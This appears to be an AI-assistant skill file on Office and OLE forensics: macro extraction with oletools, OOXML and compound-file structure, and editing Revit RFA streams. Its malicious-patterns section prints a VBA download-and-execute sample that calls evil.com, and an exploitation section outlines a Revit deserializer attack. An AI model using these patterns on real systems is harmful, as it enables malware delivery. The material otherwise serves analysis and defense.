Hacktricks-skills office-forensics
Analyze Office documents (DOC, XLS, PPT, DOCX, XLSX, PPTX) and OLE compound files for forensics and CTF challenges. Use this skill whenever the user needs to extract macros, inspect Office file structures, analyze OLE compound files, or investigate potential malware in Office documents. Also use for Revit RFA file analysis and OLE stream manipulation.
Office File Forensics
A skill for analyzing Microsoft Office documents and OLE compound files in forensic and CTF contexts.
When to use this skill
Use this skill when:
- The user needs to analyze Office documents (DOC, XLS, PPT, DOCX, XLSX, PPTX) for hidden content or macros
- The user is investigating potential malware or phishing in Office files
- The user needs to extract and analyze VBA macros from documents
- The user is working with OLE compound files (CFBF format)
- The user needs to analyze Revit RFA files or other OLE-based formats
- The user is doing CTF forensics challenges involving Office files
Quick Start
Install required tools
    # Install oletools for macro extraction and analysis
    sudo pip3 install -U oletools

    # Install CompoundFileTool for OLE manipulation (if available)
    # See: https://github.com/thezdi/CompoundFileTool
Basic macro extraction
    # Extract macro source code only (no analysis) from any Office document
    olevba -c /path/to/document.docx

    # Full analysis (default mode): macro source plus the keyword analysis table
    olevba /path/to/document.docx
Office File Formats
OLE Formats (Legacy)
- DOC, XLS, PPT - Binary OLE Compound File format
- RTF - Rich Text Format (can contain OLE objects)
- These are single binary files with embedded streams
OOXML Formats (Modern)
- DOCX, XLSX, PPTX - Office Open XML (zip containers)
- Can be inspected by unzipping: unzip document.docx -d output/
- Unzipping reveals the XML structure and file hierarchy
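The two format families can usually be told apart from the first bytes of the file, and an OOXML container can be listed without unpacking it to disk. The following is a minimal sketch using only the Python standard library; the function names `container_type` and `ooxml_macro_parts` are illustrative assumptions, not part of any tool named in this document.

```python
import io
import zipfile

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # CFBF signature
ZIP_MAGIC = b"PK\x03\x04"                      # zip local file header


def container_type(data: bytes) -> str:
    """Classify a file by its leading bytes: 'ole', 'zip' or 'unknown'."""
    if data.startswith(OLE_MAGIC):
        return "ole"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def ooxml_macro_parts(data: bytes) -> list[str]:
    """Return archive members named vbaProject.bin (case-insensitive)."""
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        return [name for name in archive.namelist()
                if name.lower().endswith("vbaproject.bin")]
```

A file that reports 'zip' is not necessarily an Office document, so treat the result as a first triage step before running the dedicated tools.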
Macro Analysis
Automatic Execution Triggers
Macros can auto-execute via these function names:
- AutoOpen - Runs when the document is opened
- AutoExec - Runs when Word starts or a global template is loaded
- Document_Open - Word document open event
- Workbook_Open - Excel workbook open event
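Once macro source has been extracted, checking it for these entry points is a simple text search. The sketch below assumes the source is available as a string and that triggers are declared as `Sub` procedures; the helper name `find_auto_exec` is hypothetical.

```python
import re

# Entry-point names listed above; VBA identifiers are case-insensitive.
AUTO_EXEC_NAMES = ("AutoOpen", "AutoExec", "Document_Open", "Workbook_Open")

# Matches "Sub Name", optionally preceded by Public or Private.
_SUB_DECL = re.compile(
    r"^\s*(?:(?:Public|Private)\s+)?Sub\s+(\w+)",
    re.IGNORECASE | re.MULTILINE,
)


def find_auto_exec(vba_source: str) -> list[str]:
    """Return declared Sub names that match a known auto-exec trigger."""
    known = {name.lower(): name for name in AUTO_EXEC_NAMES}
    declared = _SUB_DECL.findall(vba_source)
    return [known[name.lower()] for name in declared if name.lower() in known]
```

This only covers the four names in the list. olevba's own analysis recognizes a larger set, so use the sketch as an illustration rather than a replacement.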
Analysis Workflow
- Extract macros using oletools
- Review for suspicious patterns:
  - Shell object creation
  - Process execution commands
  - Network connections
  - File system manipulation
- Debug in LibreOffice (if needed):
  - Open document in LibreOffice
  - Enable macro debugging
  - Set breakpoints and watch variables
Common Malicious Patterns
    ' Shell execution
    CreateObject("WScript.Shell").Run "malware.exe"

    ' Download and execute
    Set obj = CreateObject("MSXML2.XMLHTTP")
    obj.Open "GET", "http://evil.com/payload", False
    obj.Send
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.CreateTextFile("C:\temp\payload.exe").Write obj.Response

    ' Registry manipulation
    CreateObject("WScript.Shell").RegWrite ...
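Patterns like these can be flagged mechanically in extracted macro source before a manual read-through. The sketch below is one possible approach; the categories follow the review list in this section, while the specific regular expressions and the name `flag_lines` are assumptions chosen for illustration and are far from an exhaustive ruleset.

```python
import re

# Category -> regex. Illustrative assumptions, not a complete detection set.
SUSPICIOUS_PATTERNS = {
    "shell object": re.compile(r'CreateObject\(\s*"WScript\.Shell"', re.I),
    "process execution": re.compile(r"\.Run\b|\bShell\s*\(", re.I),
    "network": re.compile(
        r"MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|URLDownloadToFile", re.I
    ),
    "file system": re.compile(
        r"Scripting\.FileSystemObject|\.CreateTextFile", re.I
    ),
    "registry": re.compile(r"\.RegWrite\b", re.I),
}


def flag_lines(vba_source: str) -> list[tuple[int, str, str]]:
    """Return (line number, category, stripped line) for every match."""
    hits = []
    for number, line in enumerate(vba_source.splitlines(), start=1):
        for category, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                hits.append((number, category, line.strip()))
    return hits
```

Plain string matching is easy to evade with concatenation or encoding, so a clean result here does not mean the macro is benign.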
OLE Compound File Analysis
Structure
OLE Compound Files (CFBF) contain:
- Storages - Folders/containers
- Streams - Files/data
- Properties - Metadata
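Inside the file, storages and streams are recorded as fixed-size 128-byte directory entries, each carrying a UTF-16 name, an object type code, a starting sector, and a size. The sketch below decodes a single entry under the assumption that the caller has already located the directory sector and sliced out the 128 bytes; the function name `parse_directory_entry` is illustrative.

```python
import struct

# Object type codes used in CFBF directory entries.
OBJECT_TYPES = {0: "unused", 1: "storage", 2: "stream", 5: "root storage"}


def parse_directory_entry(entry: bytes) -> dict:
    """Decode name, type, start sector and size from one 128-byte entry."""
    if len(entry) != 128:
        raise ValueError("a CFBF directory entry is exactly 128 bytes")
    # Offset 64: name length in bytes (uint16), offset 66: object type.
    name_len, obj_type = struct.unpack_from("<HB", entry, 64)
    # name_len includes the UTF-16 terminating null, so drop two bytes.
    name = entry[: max(name_len - 2, 0)].decode("utf-16-le")
    # Offset 116: starting sector (uint32), offset 120: size (uint64).
    start_sector, size = struct.unpack_from("<IQ", entry, 116)
    return {
        "name": name,
        "type": OBJECT_TYPES.get(obj_type, "invalid"),
        "start_sector": start_sector,
        "size": size,
    }
```

For real files, a library such as olefile (installed with oletools) handles sector chains and the mini-stream, which this sketch deliberately leaves out.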
Expand OLE Files
    # Expand OLE compound file to folder tree
    CompoundFileTool /e file.rfa /o output_folder

    # Structure becomes:
    # output_folder/
    # ├── Storage1/
    # │   └── Stream1
    # └── Stream2
Rebuild OLE Files
    # Repack folder tree back to OLE file
    CompoundFileTool /c output_folder /o output.rfa
Revit RFA File Analysis
File Structure
Revit RFA files are OLE Compound Files with:
- Storage: Global
- Stream: Latest → Path: Global/Latest
Stream Layout
    Global/Latest stream:
    ├── Header (fixed size)
    ├── GZIP-compressed payload (serialized object graph)
    ├── Zero padding
    └── ECC trailer (Error-Correcting Code)
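Given that layout, the compressed payload can be pulled out of an expanded Global/Latest stream by locating the gzip member and letting zlib report what follows it. The sketch below is hedged on two assumptions: the header length is not stated here, so it searches for the gzip magic bytes instead of using a fixed offset, and those bytes are assumed not to occur by chance inside the header. The function name `split_gzip_stream` is hypothetical.

```python
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"  # gzip ID bytes followed by the deflate method


def split_gzip_stream(blob: bytes) -> tuple[bytes, bytes, bytes]:
    """Split a blob into (prefix, decompressed payload, trailing bytes)."""
    start = blob.find(GZIP_MAGIC)
    if start < 0:
        raise ValueError("no gzip member found")
    # wbits=31 selects gzip framing; unused_data holds whatever follows
    # the end of the gzip member (here: zero padding and the trailer).
    inflater = zlib.decompressobj(wbits=31)
    payload = inflater.decompress(blob[start:])
    if not inflater.eof:
        raise ValueError("gzip member is truncated")
    return blob[:start], payload, inflater.unused_data
```

The returned prefix corresponds to the header and the trailing bytes to the padding plus ECC trailer. The sketch does not separate those two, and it does not recompute the ECC.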
Modification Workflow
Important: Revit uses the ECC trailer to auto-repair the stream, so edits that leave the trailer stale will not persist. To persist changes:
1. Expand the file:
       CompoundFileTool /e model.rfa /o rfa_out
2. Edit Global/Latest with care:
   - Keep the header intact
   - Gunzip the payload
   - Modify bytes as needed
   - Re-gzip with Revit-compatible deflate parameters
   - Preserve zero-padding
   - Recompute ECC trailer
3. Rebuild the file:
       CompoundFileTool /c rfa_out /o model_patched.rfa
Exploitation Considerations
For CTF/exploitation contexts:
- The Revit deserializer reads 16-bit class indices
- Certain types (like AString, index 0x1F) can be abused
- Destructor handling can yield type confusion
- Multiple objects can create a "weird machine" for gadget execution
- Stack pivot into conventional ROP chain
Tools Reference
oletools
| Tool | Purpose |
|---|---|
| olevba | Extract and analyze VBA macros |
| oleid | Identify OLE document types |
| oleobj | Extract embedded OLE objects |
| olemeta | Read OLE document properties |
CompoundFileTool
- Expand: CompoundFileTool /e input.rfa /o output_dir
- Create: CompoundFileTool /c input_dir /o output.rfa
- List: CompoundFileTool /l input.rfa
Other Tools
- OfficeDissector - Comprehensive Office document analysis
- LibreOffice - Macro debugging with breakpoints
- IDA Pro + WinDbg - Reverse engineering and taint tracking
- Fiddler - Proxy for supply-chain testing
Common Tasks
Task 1: Quick Macro Check
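    # Analysis results only (no macro source)
    olevba -a suspicious.docx

    # In the analysis table, look for these entry types:
    # - AutoExec: procedures that run automatically
    # - Suspicious: keywords such as Shell, CreateObject, or Run
    # - IOC: URLs, IP addresses, and executable file names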
Task 2: Full Document Analysis
    # Extract all macro source code
    olevba -c document.docx > macros.txt

    # Check document type
    oleid document.docx

    # Extract embedded objects
    oleobj document.docx
Task 3: OOXML Structure Inspection
    # Unzip to see structure
    unzip document.docx -d docx_contents/

    # Key files to check:
    # - word/document.xml (main content)
    # - word/settings.xml (document settings)
    # - word/vbaProject.bin (VBA macros, if present)
    # - _rels/.rels (relationships)
Task 4: OLE Stream Extraction
    # List all streams
    CompoundFileTool /l file.rfa

    # Expand the whole file, then pick out the stream of interest
    CompoundFileTool /e file.rfa /o extracted/
    # Then navigate to: extracted/Storage/Stream
Safety Notes
- Never run macros from untrusted sources
- Use sandboxed environments for analysis
- Disable macro execution in Office applications
- Scan extracted files with antivirus
- Work in isolated VMs for suspicious files